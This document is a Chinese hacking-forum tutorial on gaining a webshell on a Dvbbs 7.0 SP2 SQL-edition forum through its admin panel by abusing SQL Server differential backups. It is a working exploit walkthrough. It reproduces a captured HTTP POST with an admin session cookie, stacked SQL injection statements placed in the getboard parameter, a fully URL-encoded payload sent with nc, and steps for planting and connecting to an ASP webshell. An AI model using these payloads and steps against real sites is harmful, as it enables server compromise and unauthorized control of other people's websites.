动网7.0sp2sql版备份差异得到webshell

作者:bkitty 文章来源:华夏黑客同盟

前些日子,动网的漏洞相信大家都知道了,今天我们接着上次的内容说一下,进入后台如何得到webshell,以前的办法很简单,就是上传一个图片,然后我们在后台本机提交备份,就可以得到一个webshell啦,可是如果前台删了上传了呢?还有办法吗!
大家可能想到的是备份差异,可是用这种办法的话要我们知道物理路径,物理路径好知道我们进入后台会显示(如图2-1),

可是如何知道库名呢?其实这个也很简单,我们用本地提交的备份的节面,将conn.asp备份成txt就一切都ok啦(图2-2)。

这样访问我们备份的页面conn.txt就可以轻松看到我们想要的东东啦!下面就好做了。

通过前面的两部我们得到了一些有用的信息:物理路径是:D:\web\test.163vv.com\ 库名是:dvbbs,好了下面我们再是提升后台管理员那里提交备份差异语句!
首先固顶一篇贴子,关于这我以前都说过了,这里再提一句,如果有固顶的话,一定要去掉,要保证当前没有固顶的贴子才成,抓包得到如下信息:(如图2-4)

POST /bbs/admin_postings.asp?action=istop HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*
Referer: http://test.163vv.com/bbs/admin_postings.asp?action=istop
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; TencentTraveler )
Host: test.163vv.com
Content-Length: 137
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: test%2E163vv%2Ecom%2Fbbs%2F=UserID=63&usercookies=0&password=M152T6ffa2D4g8zI&userhidden=2&userclass=%B9%DC%C0%ED%D4%B1&username=maomao1&StatUserID=6121107526; ASPSESSIONIDSCQTCABQ=LFGBLDLBKLKNKJJJNDIKGNLH; upNum=0; Dvbbs=

istopaction=1&boardID=1&ID=80&title=&content=qwwq&doWealth=0&dousercp=0&douserep=0&msg=&ismsg=&getboard=1&submit=%C8%B7%C8%CF%B2%D9%D7%F7
接着打开getwebshell把前面我们得到的两条信息写进去(如图2-5),然后点第一步,得到如下信息:

接着打开getwebshell把前面我们得到的两条信息写进去(如图2-4),然后点第一步,得到如下信息:
http://127.0.0.1/test.asp?a=1;use dvbbs;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x737338373730 backup database @a to disk=@s–改成我们的注入语句:
1,1);use dvbbs;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x737338373730 backup database @a to disk=@s–再经过转编码转换得到:%31%2C%31%29%3B%75%73%65%20%64%76%62%62%73%3B%64%65%63%6C%61%72%65%20%40%61%20%73%79%73%6E%61%6D%65%2C%40%73%20%76%61%72%63%68%61%72%28%34%30%30%30%29%20%73%65%6C%65%63%74%20%40%61%3D%64%62%5F%6E%61%6D%65%28%29%2C%40%73%3D%30%78%37%33%37%33%33%38%33%37%33%37%33%30%20%62%61%63%6B%75%70%20%64%61%74%61%62%61%73%65%20%40%61%20%74%6F%20%64%69%73%6B%3D%40%73%2D%2D计算是360字节加到getboard=后面,计算Content-Length值是496,保存为文本文件,用nc提交显示成功(图2-6),

下面再到getwebshell里点第二步,用到的语句是:;use dvbbs;Drop table [heige];create table [dbo].[heige] ([cmd] [image])–再次转编码提交,往后就是一直提交、转换、转编码、计算、提交!你要是没耐心就别做了,而且不能做错一步,关于这五条语句的意思如果不理解可以看看猪头的文章:http://www.77169.org/Article/Class43/Class28/200506/18077.html ,这里为了方便大家理解我把从第二句提交那里到最后做成了动画,可以看一下(动画),不过事情没有那么幸运,当我提交完访问的时候,差点没气死我,死猪头把根目录没有设置成没有执行权限(如图2-5),

害的我不得不再次提交到D:\web\test.163vv.com\bbs\二级目录里,晕,最烦计算转编码啦,得得得,重来也当练练手。再一次执行繁琐的过程,最后终于备份成功,得到了http://test.163vv.com/bbs/ma.asp ,然后用蓝屏马的客户端连接,成功写入ok.asp,再往下的事就不说了,我们今天的目的是拿到webshell,已经达到我们的目的啦!

这里已经架了一平台,有需要测试的可以直接来此测试:http://test.163vv.com/bbs/index.asp 有问题请到华夏论坛讨论.。

动画下载:http://blog.77169.com/uploadfile/2005719234036673.zip

相关日志

发表评论